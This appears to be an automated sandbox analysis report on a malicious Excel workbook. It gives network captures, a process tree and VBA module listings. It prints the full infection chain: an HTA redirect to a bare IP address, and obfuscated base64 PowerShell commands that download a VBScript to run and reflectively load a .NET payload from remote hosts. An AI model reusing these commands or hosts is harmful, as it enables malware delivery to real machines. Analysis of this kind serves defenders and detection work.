Dec 12, 2024 21:43:31.051843882 CET	1236	IN	Data Raw: 00 4b 00 68 00 57 00 4e 00 42 00 41 00 5a 00 68 00 63 00 20 00 3d 00 20 00 22 00 71 00 43 00 71 00 47 00 6f 00 6f 00 63 00 4f 00 6e 00 65 00 4c 00 4c 00 70 00 68 00 57 00 22 00 0d 00 0a 00 6c 00 4b 00 53 00 4c 00 57 00 66 00 4c 00 57 00 6b 00 57 Data Ascii: KhWNBAZhc = "qCqGoocOneLLphW"lKSLWfLWkWjKiiq = "WqzLclWKClpKimv"ALGWJbLbKKZGGGb = "mZtCuLWRfNhCWmB"obaZvGtLLTPifU
Dec 12, 2024 21:43:31.051882982 CET	1236	IN	Data Raw: 00 55 00 6e 00 69 00 7a 00 64 00 75 00 22 00 0d 00 0a 00 61 00 57 00 5a 00 57 00 63 00 4f 00 4f 00 63 00 4c 00 76 00 75 00 55 00 4a 00 66 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 68 00 75 00 70 00 54 00 6f 00 69 00 6b 00 42 00 4c 00 6b 00 4b 00 67 Data Ascii: Unizdu"aWZWcOOcLvuUJfL = "KhupToikBLkKgmG"LzZmjUAzlmbmKKi = "nLWKLsKcGeLKkcW"cgGtacKfLnjfUar = "IGzKOsIkUdLeRGW"L
Dec 12, 2024 21:43:31.052187920 CET	1236	IN	Data Raw: 00 4c 00 6f 00 20 00 3d 00 20 00 22 00 4b 00 6d 00 57 00 6d 00 6f 00 6a 00 70 00 78 00 55 00 57 00 65 00 52 00 43 00 6c 00 4c 00 22 00 0d 00 0a 00 62 00 61 00 4f 00 6f 00 73 00 6b 00 69 00 4c 00 61 00 50 00 51 00 41 00 6b 00 4e 00 50 00 20 00 3d Data Ascii: Lo = "KmWmojpxUWeRClL"baOoskiLaPQAkNP = "qLUhNLiSnLbfUKi"cdlKWNpWSkKHnmd = "KoWUkumjWkbAbcZ"PNWsLmcAieBBGWp = "iNei
Dec 12, 2024 21:43:31.052226067 CET	1236	IN	Data Raw: 00 68 00 7a 00 62 00 52 00 4c 00 49 00 4c 00 69 00 4e 00 6e 00 6f 00 71 00 6b 00 73 00 53 00 20 00 3d 00 20 00 22 00 4e 00 64 00 7a 00 41 00 4f 00 63 00 54 00 75 00 4a 00 68 00 47 00 47 00 55 00 48 00 50 00 22 00 0d 00 0a 00 62 00 57 00 6f 00 72 Data Ascii: hzbRLILiNnoqksS = "NdzAOcTuJhGGUHP"bWorhiiLLZPgceO = "QobAsmkoZWcWnLh"orGWueeLceZpWki = "mtQRAiiAsLAALmC"UZtxLciL
Dec 12, 2024 21:43:31.052263021 CET	1236	IN	Data Raw: 00 70 00 42 00 7a 00 7a 00 66 00 67 00 4c 00 5a 00 4b 00 57 00 55 00 42 00 22 00 0d 00 0a 00 71 00 63 00 70 00 6c 00 62 00 62 00 61 00 63 00 7a 00 55 00 74 00 69 00 75 00 50 00 7a 00 20 00 3d 00 20 00 22 00 57 00 53 00 71 00 69 00 69 00 48 00 5a Data Ascii: pBzzfgLZKWUB"qcplbbaczUtiuPz = "WSqiiHZGkdmtanK"mZUtkbGCGbBkGcu = "AKulmuGBhpPoWWz"QmbLvzUPqmrCcLq = "snGLiPPAgriLk
Dec 12, 2024 21:43:31.052300930 CET	1236	IN	Data Raw: 00 47 00 75 00 69 00 47 00 70 00 4c 00 62 00 57 00 20 00 3d 00 20 00 22 00 4e 00 74 00 6a 00 47 00 63 00 4b 00 6e 00 63 00 68 00 5a 00 6d 00 4e 00 6e 00 42 00 63 00 22 00 0d 00 0a 00 4c 00 55 00 50 00 55 00 49 00 4f 00 63 00 74 00 4b 00 4e 00 4b Data Ascii: GuiGpLbW = "NtjGcKnchZmNnBc"LUPUIOctKNKcZUi = "gQfWWjiLeKhWHWL"GfNjReivWCAsxsb = "gooqqWddmWqWicW"aCqLLPGtWBLjOKP =
Dec 12, 2024 21:43:31.053201914 CET	1236	IN	Data Raw: 00 65 00 57 00 42 00 22 00 0d 00 0a 00 47 00 4e 00 71 00 69 00 6d 00 57 00 52 00 55 00 4c 00 4f 00 4a 00 4c 00 62 00 4c 00 62 00 20 00 3d 00 20 00 22 00 6b 00 4c 00 6f 00 4f 00 47 00 57 00 6d 00 4f 00 75 00 55 00 6f 00 4b 00 64 00 55 00 4a 00 22 Data Ascii: eWB"GNqimWRULOJLbLb = "kLoOGWmOuUoKdUJ"LukCPmWcxWoGfLB = "GHUbWdreWChpZdQ"WBLmeLWKWdpAKZC = "cLdWWLcxxLjotic"Cn
Dec 12, 2024 21:43:31.053256035 CET	1236	IN	Data Raw: 00 3d 00 20 00 22 00 57 00 65 00 74 00 54 00 43 00 47 00 57 00 6d 00 68 00 4c 00 4b 00 7a 00 57 00 66 00 70 00 22 00 0d 00 0a 00 57 00 4c 00 4c 00 69 00 4b 00 70 00 70 00 4f 00 47 00 55 00 62 00 57 00 62 00 6c 00 69 00 20 00 3d 00 20 00 22 00 6d Data Ascii: = "WetTCGWmhLKzWfp"WLLiKppOGUbWbli = "mtoNKOcWmWzhiLk"LNxfAGtZWZjqLWk = "GqzLRcWkacmbzeN"zGpWBiGiLLihnWx = "BUhPGge
Dec 12, 2024 21:43:31.053296089 CET	1236	IN	Data Raw: 00 5a 00 74 00 66 00 6b 00 53 00 76 00 50 00 4c 00 47 00 78 00 4f 00 43 00 41 00 75 00 20 00 3d 00 20 00 22 00 75 00 47 00 4f 00 66 00 62 00 78 00 57 00 50 00 4c 00 74 00 57 00 6d 00 75 00 6f 00 50 00 22 00 0d 00 0a 00 6b 00 57 00 6b 00 41 00 68 Data Ascii: ZtfkSvPLGxOCAu = "uGOfbxWPLtWmuoP"kWkAhzaGxKiSece = "uZHAzcUbUKKLcKG"kNAhgSxkeiKkcWc = "WmAczjZWlLLPqWB"cifNNWLWioI
Dec 12, 2024 21:43:31.171879053 CET	1236	IN	Data Raw: 00 43 00 55 00 7a 00 63 00 4b 00 57 00 57 00 4c 00 42 00 22 00 0d 00 0a 00 69 00 6b 00 6c 00 4b 00 69 00 7a 00 6d 00 4a 00 47 00 4e 00 4c 00 6e 00 57 00 70 00 4b 00 20 00 3d 00 20 00 22 00 4c 00 51 00 69 00 55 00 63 00 52 00 47 00 6f 00 4b 00 5a Data Ascii: CUzcKWWLB"iklKizmJGNLnWpK = "LQiUcRGoKZcLZTP"uRLGWblUfKfWcWC = "qpzpfWkJRLooOcu"hiLccLWZmWUWAci = "KGlNnpufCpLkZt

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	172.67.163.184	443	3584	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-12-12 20:43:18 UTC	340	OUT	GET /yyKnY4?&blow=cold&peacoat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: jktc.pro Connection: Keep-Alive
2024-12-12 20:43:18 UTC	1224	IN	HTTP/1.1 302 Found Date: Thu, 12 Dec 2024 20:43:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 113 Connection: close cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin x-dns-prefetch-control: off x-frame-options: SAMEORIGIN strict-transport-security: max-age=15552000; includeSubDomains x-download-options: noopen x-content-type-options: nosniff origin-agent-cluster: ?1 x-permitted-cross-domain-policies: none referrer-policy: no-referrer x-xss-protection: 0 location: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta vary: Accept, Accept-Encoding x-do-app-origin: 5a212e0f-46b3-415c-8929-fe4f6fb9f10b Cache-Control: private x-do-orig-status: 302 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=psU1DHVc1prIBf%2FsggxnggyGsA1fbpJtd3rM9Zi7pkVblEOERJ4p3WvBhdxcrd3CpOUnH9AMzMXuEZ8qkqJuNk8pAphsVru279q2qzEmTEU9H58HL36MFz37Rw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f108bbfadd08c7e-EWR alt-svc: h3=":443"; ma=86400
2024-12-12 20:43:18 UTC	216	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 35 34 36 26 6d 69 6e 5f 72 74 74 3d 32 31 35 30 26 72 74 74 5f 76 61 72 3d 31 30 38 39 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 34 26 72 65 63 76 5f 62 79 74 65 73 3d 39 32 32 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 33 35 38 31 33 39 26 63 77 6e 64 3d 31 38 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 37 31 61 38 32 36 61 39 64 61 34 35 66 65 37 26 74 73 3d 37 37 36 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2546&min_rtt=2150&rtt_var=1089&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2804&recv_bytes=922&delivery_rate=1358139&cwnd=184&unsent_bytes=0&cid=c71a826a9da45fe7&ts=776&x=0"
2024-12-12 20:43:18 UTC	113	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 35 2f 37 33 2f 79 63 63 2f 67 6f 6f 64 74 68 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 63 61 70 69 74 61 6c 74 68 69 6e 67 73 66 6f 72 67 72 65 61 74 6e 65 77 73 77 69 74 68 67 6f 6f 64 6d 6f 72 6e 67 2e 68 74 61 Data Ascii: Found. Redirecting to http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	104.21.34.183	443	3916	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 20:43:22 UTC	364	OUT	GET /yyKnY4?&blow=cold&peacoat HTTP/1.1 Accept: / Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: jktc.pro Connection: Keep-Alive
2024-12-12 20:43:23 UTC	1224	IN	HTTP/1.1 302 Found Date: Thu, 12 Dec 2024 20:43:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 113 Connection: close cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: same-origin x-dns-prefetch-control: off x-frame-options: SAMEORIGIN strict-transport-security: max-age=15552000; includeSubDomains x-download-options: noopen x-content-type-options: nosniff origin-agent-cluster: ?1 x-permitted-cross-domain-policies: none referrer-policy: no-referrer x-xss-protection: 0 location: http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta vary: Accept, Accept-Encoding x-do-app-origin: 5a212e0f-46b3-415c-8929-fe4f6fb9f10b Cache-Control: private x-do-orig-status: 302 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNqgqmsEwpjxfbKbNMi8XZ8l8wF%2BsVQAq1wo2ic9kY62tQ6AQwRUXeDhj3OhMpa9T6XvFwlq6LWksUJ7Vkoy1hNlLle6l40tF8gkVPW3te9FouwpsncJX4xzSg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f108bdc4c7541f2-EWR alt-svc: h3=":443"; ma=86400
2024-12-12 20:43:23 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 32 34 31 26 6d 69 6e 5f 72 74 74 3d 35 32 30 30 26 72 74 74 5f 76 61 72 3d 32 30 33 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 33 26 72 65 63 76 5f 62 79 74 65 73 3d 39 34 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 35 32 37 39 33 33 26 63 77 6e 64 3d 32 32 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 61 39 30 39 32 32 66 30 31 36 61 30 31 39 39 26 74 73 3d 37 33 37 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=5241&min_rtt=5200&rtt_var=2032&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2803&recv_bytes=946&delivery_rate=527933&cwnd=229&unsent_bytes=0&cid=5a90922f016a0199&ts=737&x=0"
2024-12-12 20:43:23 UTC	113	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 35 2f 37 33 2f 79 63 63 2f 67 6f 6f 64 74 68 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 63 61 70 69 74 61 6c 74 68 69 6e 67 73 66 6f 72 67 72 65 61 74 6e 65 77 73 77 69 74 68 67 6f 6f 64 6d 6f 72 6e 67 2e 68 74 61 Data Ascii: Found. Redirecting to http://107.172.44.175/73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta

Target ID:	0
Start time:	15:42:26
Start date:	12/12/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13fca0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	15:43:18
Start date:	12/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13f850000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:43:24
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Imagebase:	0x4a090000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:43:24
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"
Imagebase:	0x13f420000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:43:27
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline"
Imagebase:	0x13ff30000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:43:28
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5706.tmp" "c:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP"
Imagebase:	0x13f590000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:43:33
Start date:	12/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS"
Imagebase:	0xff8b0000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:43:34
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted
Imagebase:	0x13f420000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "Sheet1"
10	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "Sheet2"
10	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "ThisWorkbook"
10	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True

Reset < >

Analysis Process: mshta.exePID: 3916, Parent PID: 564COMMON

Executed Functions

Function 029B0FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

